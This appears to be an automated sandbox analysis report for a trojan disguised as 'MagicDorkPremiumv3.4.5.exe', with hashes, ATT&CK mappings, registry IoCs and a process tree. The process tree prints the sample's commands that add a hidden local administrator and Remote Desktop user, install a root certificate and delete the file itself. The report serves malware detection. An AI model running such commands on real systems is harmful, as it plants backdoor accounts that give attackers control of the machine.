90df211fe009f950d2f0a903bf2a2e609788b2d9d5183a28aab02c528ee8d505

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-12-2024 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MagicDorkPremiumv3.4.5.exe
Size

8KB
MD5

bc4bc3abc2a6c7008ba586394e653f6a
SHA1

a213a27ad4d756506e7a8b581ee6686031c70610
SHA256

90df211fe009f950d2f0a903bf2a2e609788b2d9d5183a28aab02c528ee8d505
SHA512

e52a45671658725444e3b6cb72547f942b831274980f239f8e6a7899dd9506538ccd3616532f1492a94c1f47a2c09fd9f88480f615da61039fa604223f280b8d
SSDEEP

96:yp+bNXPhviNjOi4cBmdjS+d579i9bm605/ltk+Vdc0M1ks5OaczNtK:ykZXRikFdm+f96bmzZNdfMOs1m

Score

9^/10

discovery lateral_movement

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 1 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3004	powershell.exe

Deletes itself 1 IoCs

pid	Process
2956	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MagicDorkPremiumv3.4.5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1824	timeout.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	MagicDorkPremiumv3.4.5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	MagicDorkPremiumv3.4.5.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
536	powershell.exe
2912	powershell.exe
3004	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeDebugPrivilege	1864	MagicDorkPremiumv3.4.5.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 1864 wrote to memory of 536	1864	MagicDorkPremiumv3.4.5.exe	30
PID 1864 wrote to memory of 536	1864	MagicDorkPremiumv3.4.5.exe	30
PID 1864 wrote to memory of 536	1864	MagicDorkPremiumv3.4.5.exe	30
PID 1864 wrote to memory of 536	1864	MagicDorkPremiumv3.4.5.exe	30
PID 536 wrote to memory of 320	536	powershell.exe	32
PID 536 wrote to memory of 320	536	powershell.exe	32
PID 536 wrote to memory of 320	536	powershell.exe	32
PID 536 wrote to memory of 320	536	powershell.exe	32
PID 320 wrote to memory of 980	320	net.exe	33
PID 320 wrote to memory of 980	320	net.exe	33
PID 320 wrote to memory of 980	320	net.exe	33
PID 320 wrote to memory of 980	320	net.exe	33
PID 1864 wrote to memory of 2912	1864	MagicDorkPremiumv3.4.5.exe	34
PID 1864 wrote to memory of 2912	1864	MagicDorkPremiumv3.4.5.exe	34
PID 1864 wrote to memory of 2912	1864	MagicDorkPremiumv3.4.5.exe	34
PID 1864 wrote to memory of 2912	1864	MagicDorkPremiumv3.4.5.exe	34
PID 2912 wrote to memory of 2204	2912	powershell.exe	37
PID 2912 wrote to memory of 2204	2912	powershell.exe	37
PID 2912 wrote to memory of 2204	2912	powershell.exe	37
PID 2912 wrote to memory of 2204	2912	powershell.exe	37
PID 2204 wrote to memory of 2892	2204	net.exe	38
PID 2204 wrote to memory of 2892	2204	net.exe	38
PID 2204 wrote to memory of 2892	2204	net.exe	38
PID 2204 wrote to memory of 2892	2204	net.exe	38
PID 1864 wrote to memory of 3004	1864	MagicDorkPremiumv3.4.5.exe	39
PID 1864 wrote to memory of 3004	1864	MagicDorkPremiumv3.4.5.exe	39
PID 1864 wrote to memory of 3004	1864	MagicDorkPremiumv3.4.5.exe	39
PID 1864 wrote to memory of 3004	1864	MagicDorkPremiumv3.4.5.exe	39
PID 3004 wrote to memory of 2604	3004	powershell.exe	41
PID 3004 wrote to memory of 2604	3004	powershell.exe	41
PID 3004 wrote to memory of 2604	3004	powershell.exe	41
PID 3004 wrote to memory of 2604	3004	powershell.exe	41
PID 2604 wrote to memory of 2624	2604	net.exe	42
PID 2604 wrote to memory of 2624	2604	net.exe	42
PID 2604 wrote to memory of 2624	2604	net.exe	42
PID 2604 wrote to memory of 2624	2604	net.exe	42
PID 1864 wrote to memory of 2956	1864	MagicDorkPremiumv3.4.5.exe	44
PID 1864 wrote to memory of 2956	1864	MagicDorkPremiumv3.4.5.exe	44
PID 1864 wrote to memory of 2956	1864	MagicDorkPremiumv3.4.5.exe	44
PID 1864 wrote to memory of 2956	1864	MagicDorkPremiumv3.4.5.exe	44
PID 2956 wrote to memory of 1824	2956	cmd.exe	46
PID 2956 wrote to memory of 1824	2956	cmd.exe	46
PID 2956 wrote to memory of 1824	2956	cmd.exe	46
PID 2956 wrote to memory of 1824	2956	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\MagicDorkPremiumv3.4.5.exe
"C:\Users\Admin\AppData\Local\Temp\MagicDorkPremiumv3.4.5.exe"
1⤵
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1864
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net user ThanksEgalsa ThanksEgalsa /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" user ThanksEgalsa ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:320
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 user ThanksEgalsa ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:980
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup administrators ThanksEgalsa /add
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2204
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2892
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" net localgroup "Remote Desktop Users" ThanksEgalsa /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\SysWOW64\net.exe
    "C:\Windows\system32\net.exe" localgroup Remote Desktop Users ThanksEgalsa /add
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users ThanksEgalsa /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:2624
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpDCA9.tmp.cmd""
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2956
- - C:\Windows\SysWOW64\timeout.exe
    timeout 4
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:1824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmpDCA9.tmp.cmd

Filesize
168B

MD5
565d9b0f3c419f8f154227d6ed70a37f

SHA1
0d7ba013478aced3260c04717475773617f6943a

SHA256
3ca116e8449fdb80da4b39ed604ebe672d19e2c0bb5d7985f42d3ea4a4fe6ffb

SHA512
228e5fd364fde9a02c3ca07b0f9a558b6658d2dd37c513a2a1f4068a6235fa3669d3e3ce1439abd413a5a12c26d5e9e1a33d107280ba2c9a856c86af24bc5c4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
96d2afbc93f3157b4e58eaf995515807

SHA1
2c5a9136846cc8e0a7cb1895fb018553c19a4436

SHA256
622e431fa61755a934211e96053489dbfe0fd20a519bb460116014f8d3e83297

SHA512
d837878deb5d1941f8d6b61c9b656a264d8a530286153680b6b4567adf06d2ff094c63fbf8b44bc3f1afc2da8fa71528cc4602983580196099b670de4a7b510c

Download Submit
memory/536-4-0x0000000002900000-0x0000000002940000-memory.dmp

Filesize
256KB

Download
memory/1864-0-0x00000000749FE000-0x00000000749FF000-memory.dmp

Filesize
4KB

Download
memory/1864-1-0x0000000000360000-0x0000000000368000-memory.dmp

Filesize
32KB

Download